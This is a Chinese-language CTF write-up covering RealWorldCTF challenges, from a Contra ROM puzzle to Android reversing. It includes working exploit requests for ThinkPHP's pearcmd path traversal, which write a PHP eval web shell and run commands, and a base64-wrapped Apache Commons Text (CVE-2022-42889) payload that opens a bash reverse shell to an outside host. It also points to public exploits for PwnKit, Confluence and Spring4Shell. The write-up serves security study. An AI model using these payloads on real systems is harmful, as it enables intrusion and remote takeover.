🐑了拼🐑

Score: 46
Check-In, difficulty:Baby

签到题,在/assets/index.86036a46.js中直接搜索rwctf,可以找到flag:

1
rwctf{wellcome_to_the_rwctf!}

Be-a-Language-Expert

Score: 58
Web, difficulty:Baby

I heard that there was a vulnerability in ThinkPHP recently, but luckily I set the permissions low and ran it in a docker container, so no one can RCE me.

访问主页,提示:

1
ThinkPHP V6.0.12LTS

最新的Thinkphp多语言模块RCE漏洞,影响范围:

1
2
3
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x

写文件:

1
2
3
4
5
6
7
8
9
10
GET /index.php?+config-create+/<?=eval($_REQUEST['a'])?>+/tmp/hello.php HTTP/1.1
Host: 47.98.124.175:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
think-lang: ../../../../../../../../usr/local/lib/php/pearcmd
Cookie: think_lang=zh-cn
Connection: close

执行命令:

1
2
3
4
5
6
7
8
9
10
GET /?a=system('/readflag'); HTTP/1.1
Host: 47.98.124.175:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
think-lang: ../../../../../../../../tmp/hello
Cookie: think_lang=zh-cn
Connection: close
1
rwctf{PHP_1s_Th3_B3st_L@ngvag3_1n_the_w0r1d}

Evil MySQL Server

Score: 64
Web, difficulty:Normal

Please do not connect to an evil mysql server.
P.S. flag path: /flag

MySQL的load data local infile特性的安全问题,具体可见:

CSS-T | Mysql Client 任意文件读取攻击链拓展 (seebug.org)

直接使用开源项目,构造一个fake mysql server即可。
https://github.com/allyshka/Rogue-MySql-Server

1
rwctf{d041bd251adb4380b3e1dea2bd355f8f}

Be-a-Famicom-Hacker

Score: 136
Misc, difficulty:Schrödinger

Contra is a run-and-gun shooter video game developed and published by Konami.You will play as Bill Rizer or Lance Bean to destroy the evil Red Falcon Organization and uncover the true nature of the alien entity controlling them.
Please wrap the flag with rwctf{} when submitting.

非常有意思的一道题…
题目给了FC游戏魂斗罗(日版)的改版NES文件。
找了个FC模拟器玩到通关,看完过关动画,只发现了刚开始选人界面的版权信息被修改了。
找了日版原版NES比对了下,发现有4处改动。

NES文件比对
猜测Flag估计是藏在第二处改动对应的画面里了。

最后玩了一天没找到这个画面,觉得不太可能,应该是隐藏的画面,于是去bilibili搜各种彩蛋,最后在一个弹幕里发现:
B站弹幕

Flag藏在过关动画的隐藏画面里。嗯,作者你真棒。
通关画面

顺便总结一下魂斗罗秘籍,感觉童年又完整了。
30条命:开始界面按上上下下左右左右BABA。
选关:开始界面按开始并松开后,同时按住选择键+上+左不放,直到出现选关界面。
通关隐藏界面:通关字幕处,按往选择键+确认键不放,直到出现该界面。

1
rwctf{UUDDLRLRBA+START}

ApacheCommandText

Score: 77
Web, difficulty:Normal

Your friend set up a website called “Apache Commons Text Labotoray” with vulnerable version 1.9. In case of being hacked, he adds some restrictions and claims that no one can compromise him. Now, it’s your turn to give him a lesson.

CVE-2022-42889,Apache Commons Text 任意代码执行漏洞,但是做了一些过滤,比如存在script时,会提示“hack! [script, file, url, dns] is not allowed!”,并且第一个${}似乎不能被解析。

把命令执行放在第二个${}里,套一层base64即可绕过,也就是最终填到靶机的是类似:

1
${}${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygnd2hvYW1pJyl9}

其中base64那串是类似下面的语句base64后的值:

1
${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}

这里Java的exec如果执行普通的bash反弹,执行不了,可以参考这个文章:
https://www.jianshu.com/p/ae3922db1f70
可以使用:

1
bash -c $@|bash 0 echo bash -i >& /dev/tcp/1.1.1.1/8000 0>&1

组合后:

1
${script:javascript:java.lang.Runtime.getRuntime().exec('bash -c $@|bash 0 echo bash -i >& /dev/tcp/1.1.1.1/8000 0>&1')}

base64后最终payload:

1
${}${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygnYmFzaCAtYyAkQHxiYXNoIDAgZWNobyBiYXNoIC1pID4mIC9kZXYvdGNwLzEuMS4xLjEvODAwMCAwPiYxJyl9}
1
rwctf{rwctf_1terat1on_1s_4_g0od_des1gN_e5aa}

Yummy Api

Score: 69
Web, difficulty:Baby

What bad intentions could there be for a yummy api?

YApi < 1.12.0远程命令执行漏洞。
可参考:
https://mp.weixin.qq.com/s/mrm2goeLNlrIyWCYguEG0A
https://paper.seebug.org/2028/

第一篇文章有暴token和暴uid脚本,第二篇文章有上传逃逸脚本和触发脚本的代码。

1
rwctf{y0u_h4ve_f0und_yvmmy_@pi_f0r_c1ph3r_ch4ll3ng3s}

Be-a-PK-LPE-Master

Score: 143
Pwn, Misc, difficulty:Baby

pkexec提权漏洞(CVE-2021-4034),找个脚本,一把梭。
供参考:https://blog.csdn.net/qq_41252520/article/details/123030682

1
rwctf{CVE-2021-4034-PwnKit-is-Awes0me-But-Do-you-know-Handling-argc-0-in-the-kernel}

SNAKE

Score: 154
Reverse, Android,difficulty:Baby

Keep eating

附件是个安卓APK。
解包反编译,代码审计,有部分代码反编译失败。
在\res\drawable下面还有可疑的数字和字母图片。
在com.example.ct_sanke.SnakeView类下面,有一串很长的字符串,疑似密文,大概这样:
Snake反编译

图里那个a.a()很可能是解密代码。
定位到SnakeView.smali,可以很直观的找到那串密文,再下面是循环。
插两行调用android.util.Log.e()的代码:
Snake修改

注意这边加了本地变量,所以函数最开始的.locals要对应增加。
重新打包,运行。
日志可以输出解密后的东西:
Snake输出日志

对应到图片上,得到:

1
EK33PG01NGD0N0TG1V3UPP

尝试了几下,可得flag:

1
rwctf{K33PG01NGD0N0TG1V3UP}

即Keep going do not give up的英文变体。

Be-a-Wiki-Hacker

Score: 61
Web, difficulty:Normal

Your wiki is my wiki.

CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection
可找个脚本直接一把梭。

1
rwctf{154fea37c0f14b519942931db23e89e8}

Spring4Shell

Score: 201
Web, difficulty:Normal

“web”-spring4shell:Sping framework is No.1, can you find some type of leakage and get the shell?

CVE-2022-22965,Spring4Shell漏洞。
这边因为只要读取flag,可以直接把文件系统挂到appBase上:

spring4shell

然后去GET /root/flag,即是读/root/flag的文件内容了。